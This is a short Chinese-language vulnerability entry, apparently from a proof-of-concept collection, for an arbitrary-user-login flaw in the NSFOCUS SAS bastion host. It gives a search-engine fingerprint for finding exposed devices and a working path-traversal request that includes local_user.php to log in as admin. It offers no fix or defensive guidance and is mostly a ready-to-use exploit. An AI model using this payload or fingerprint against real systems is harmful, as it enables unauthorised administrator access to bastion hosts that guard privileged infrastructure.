绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞¶
漏洞描述¶
绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录
漏洞影响¶
网络测绘¶
body="'/needUsbkey.php?username='"
漏洞复现¶
登陆页面
验证POC
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
